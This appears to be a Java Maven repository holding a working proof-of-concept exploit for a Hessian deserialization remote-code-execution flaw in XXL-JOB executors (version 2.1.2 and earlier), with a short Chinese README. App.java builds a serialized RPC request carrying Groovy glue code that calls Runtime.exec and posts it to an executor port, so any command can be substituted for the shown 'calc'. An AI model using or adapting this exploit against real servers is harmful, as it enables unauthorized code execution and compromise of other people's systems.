├── src
    ├── main
    │   └── java
    │   │   ├── META-INF
    │   │       └── MANIFEST.MF
    │   │   └── com
    │   │       └── example
    │   │           ├── Serializables.java
    │   │           └── App.java
    └── test
    │   └── java
    │       └── com
    │           └── example
    │               └── AppTest.java
├── README.md
└── pom.xml


/src/main/java/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: com.example.App
3 | 
4 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # XxlJob-Hessian-RCE
2 | 此漏洞为Xxljob配置不当情况下反序列化RCE
3 | 
4 | XxlJob<=2.1.2，需要利用Hessian触发。
5 | 
6 | XxlJob >= 2.2.0 会支持RESTFUL API，直接打公开的POC过去即可。
7 | 
8 | 该项目主要是探讨Hessian触发方式。
9 | 


--------------------------------------------------------------------------------
/src/test/java/com/example/AppTest.java:
--------------------------------------------------------------------------------
 1 | package com.example;
 2 | 
 3 | import static org.junit.Assert.assertTrue;
 4 | 
 5 | import org.junit.Test;
 6 | 
 7 | /**
 8 |  * Unit test for simple App.
 9 |  */
10 | public class AppTest 
11 | {
12 |     /**
13 |      * Rigorous Test :-)
14 |      */
15 |     @Test
16 |     public void shouldAnswerWithTrue()
17 |     {
18 |         assertTrue( true );
19 |     }
20 | }
21 | 


--------------------------------------------------------------------------------
/src/main/java/com/example/Serializables.java:
--------------------------------------------------------------------------------
 1 | package com.example;
 2 | 
 3 | import java.io.*;
 4 | 
 5 | public class Serializables {
 6 | 
 7 |     public static byte[] serialize(final Object obj) throws IOException {
 8 |         final ByteArrayOutputStream out = new ByteArrayOutputStream();
 9 |         serialize(obj, out);
10 |         return out.toByteArray();
11 |     }
12 | 
13 |     public static void serialize(final Object obj, final OutputStream out) throws IOException {
14 |         final ObjectOutputStream objOut = new ObjectOutputStream(out);
15 |         objOut.writeObject(obj);
16 |         objOut.flush();
17 |         objOut.close();
18 |     }
19 | 
20 |     public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
21 |         final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
22 |         return deserialize(in);
23 |     }
24 | 
25 |     public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
26 |         final ObjectInputStream objIn = new ObjectInputStream(in);
27 |         return objIn.readObject();
28 |     }
29 | 
30 | }


--------------------------------------------------------------------------------
/src/main/java/com/example/App.java:
--------------------------------------------------------------------------------
 1 | package com.example;
 2 | 
 3 | import com.xxl.job.core.biz.model.TriggerParam;
 4 | import com.xxl.rpc.remoting.net.params.XxlRpcRequest;
 5 | 
 6 | import com.xxl.rpc.serialize.impl.HessianSerializer;
 7 | import org.asynchttpclient.AsyncCompletionHandler;
 8 | import org.asynchttpclient.AsyncHttpClient;
 9 | import org.asynchttpclient.DefaultAsyncHttpClient;
10 | import org.asynchttpclient.Response;
11 | 
12 | import java.io.IOException;
13 | import java.util.Date;
14 | 
15 | public class App {
16 | 
17 |     private static void sendData(String url, byte[] bytes) {
18 |         AsyncHttpClient c = new DefaultAsyncHttpClient();
19 | 
20 |         try{
21 |             c.preparePost(url)
22 |             .setBody(bytes)
23 |             .execute(new AsyncCompletionHandler<Response>() {
24 |                 @Override
25 |                 public Response onCompleted(Response response) throws Exception {
26 |                     System.out.println("Server Return Data: ");
27 |                     System.out.println(response.getResponseBody());
28 |                     return response;
29 |                 }
30 | 
31 |                 @Override
32 |                 public void onThrowable(Throwable t) {
33 |                     System.out.println("HTTP出现异常");
34 |                     t.printStackTrace();
35 |                     super.onThrowable(t);
36 |                 }
37 |             }).toCompletableFuture().join();
38 | 
39 |             c.close();
40 |         } catch (Exception e) {
41 |             e.printStackTrace();
42 |         } finally {
43 |             try {
44 |                 c.close();
45 |             } catch (IOException e) {
46 |                 e.printStackTrace();
47 |             }
48 |         }
49 | 
50 | 
51 |     }
52 | 
53 |     public static void main( String[] args ) throws Exception {
54 | 
55 |         String code = "package com.xxl.job.service.handler;\n" +
56 |                 "\n" +
57 |                 "import com.xxl.job.core.log.XxlJobLogger;\n" +
58 |                 "import com.xxl.job.core.biz.model.ReturnT;\n" +
59 |                 "import com.xxl.job.core.handler.IJobHandler;\n" +
60 |                 "import java.lang.Runtime;\n" +
61 |                 "\n" +
62 |                 "public class DemoGlueJobHandler extends IJobHandler {\n" +
63 |                 "\n" +
64 |                 "\t@Override\n" +
65 |                 "\tpublic ReturnT<String> execute(String param) throws Exception {\n" +
66 |                 "      \tRuntime.getRuntime().exec(\"calc\");\n" +
67 |                 "\t\treturn ReturnT.SUCCESS;\n" +
68 |                 "\t}\n" +
69 |                 "\n" +
70 |                 "}\n";
71 | 
72 |         System.out.println(code);
73 | 
74 |         TriggerParam params = new TriggerParam();
75 |         params.setJobId(10);
76 |         params.setExecutorBlockStrategy("SERIAL_EXECUTION");
77 |         params.setLogId(10);
78 |         params.setLogDateTime((new Date()).getTime());
79 |         params.setGlueType("GLUE_GROOVY");
80 |         params.setGlueSource(code);
81 |         params.setGlueUpdatetime((new Date()).getTime());
82 | 
83 |         XxlRpcRequest xxlRpcRequest = new XxlRpcRequest();
84 |         xxlRpcRequest.setRequestId("111");
85 |         xxlRpcRequest.setClassName("com.xxl.job.core.biz.ExecutorBiz");
86 |         xxlRpcRequest.setMethodName("run");
87 |         xxlRpcRequest.setParameterTypes(new Class[]{TriggerParam.class});
88 |         xxlRpcRequest.setParameters(new Object[] {params});
89 |         xxlRpcRequest.setCreateMillisTime((new Date()).getTime());
90 | 
91 |         HessianSerializer serializer = new HessianSerializer();
92 | 
93 |         byte[] data = serializer.serialize(xxlRpcRequest);
94 |         sendData("http://127.0.0.1:9999", data);
95 | 
96 |     }
97 | }
98 | 


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | 
  3 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4 |   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  5 |   <modelVersion>4.0.0</modelVersion>
  6 | 
  7 |   <groupId>com.example</groupId>
  8 |   <artifactId>xxljob-exp</artifactId>
  9 |   <version>1.0-SNAPSHOT</version>
 10 | 
 11 |   <name>xxljob-exp</name>
 12 |   <!-- FIXME change it to the project's website -->
 13 |   <url>http://www.example.com</url>
 14 | 
 15 |   <properties>
 16 |     <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
 17 |     <maven.compiler.source>1.7</maven.compiler.source>
 18 |     <maven.compiler.target>1.7</maven.compiler.target>
 19 |   </properties>
 20 | 
 21 |   <dependencies>
 22 |     <dependency>
 23 |       <groupId>junit</groupId>
 24 |       <artifactId>junit</artifactId>
 25 |       <version>4.11</version>
 26 |       <scope>test</scope>
 27 |     </dependency>
 28 | 
 29 |     <!-- https://mvnrepository.com/artifact/com.xuxueli/xxl-job-core -->
 30 |     <dependency>
 31 |       <groupId>com.xuxueli</groupId>
 32 |       <artifactId>xxl-job-core</artifactId>
 33 |       <version>2.1.2</version>
 34 |     </dependency>
 35 | 
 36 | 
 37 |     <!-- https://mvnrepository.com/artifact/com.xuxueli/xxl-rpc-core -->
 38 |     <dependency>
 39 |       <groupId>com.xuxueli</groupId>
 40 |       <artifactId>xxl-rpc-core</artifactId>
 41 |       <version>1.5.0</version>
 42 |     </dependency>
 43 | 
 44 |     <!-- https://mvnrepository.com/artifact/com.xuxueli/xxl-rpc -->
 45 |     <dependency>
 46 |       <groupId>com.xuxueli</groupId>
 47 |       <artifactId>xxl-rpc</artifactId>
 48 |       <version>1.5.0</version>
 49 |       <type>pom</type>
 50 |     </dependency>
 51 | 
 52 | 
 53 | 
 54 |     <dependency>
 55 |       <groupId>org.asynchttpclient</groupId>
 56 |       <artifactId>async-http-client</artifactId>
 57 |       <version>2.8.1</version>
 58 |     </dependency>
 59 | 
 60 |   </dependencies>
 61 | 
 62 |   <build>
 63 |     <pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->
 64 |       <plugins>
 65 |         <!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle -->
 66 |         <plugin>
 67 |           <artifactId>maven-clean-plugin</artifactId>
 68 |           <version>3.1.0</version>
 69 |         </plugin>
 70 |         <!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging -->
 71 |         <plugin>
 72 |           <artifactId>maven-resources-plugin</artifactId>
 73 |           <version>3.0.2</version>
 74 |         </plugin>
 75 |         <plugin>
 76 |           <artifactId>maven-compiler-plugin</artifactId>
 77 |           <version>3.8.0</version>
 78 |         </plugin>
 79 |         <plugin>
 80 |           <artifactId>maven-surefire-plugin</artifactId>
 81 |           <version>2.22.1</version>
 82 |         </plugin>
 83 |         <plugin>
 84 |           <artifactId>maven-jar-plugin</artifactId>
 85 |           <version>3.0.2</version>
 86 |         </plugin>
 87 |         <plugin>
 88 |           <artifactId>maven-install-plugin</artifactId>
 89 |           <version>2.5.2</version>
 90 |         </plugin>
 91 |         <plugin>
 92 |           <artifactId>maven-deploy-plugin</artifactId>
 93 |           <version>2.8.2</version>
 94 |         </plugin>
 95 |         <!-- site lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#site_Lifecycle -->
 96 |         <plugin>
 97 |           <artifactId>maven-site-plugin</artifactId>
 98 |           <version>3.7.1</version>
 99 |         </plugin>
100 |         <plugin>
101 |           <artifactId>maven-project-info-reports-plugin</artifactId>
102 |           <version>3.0.0</version>
103 |         </plugin>
104 |       </plugins>
105 |     </pluginManagement>
106 |   </build>
107 | </project>
108 | 


--------------------------------------------------------------------------------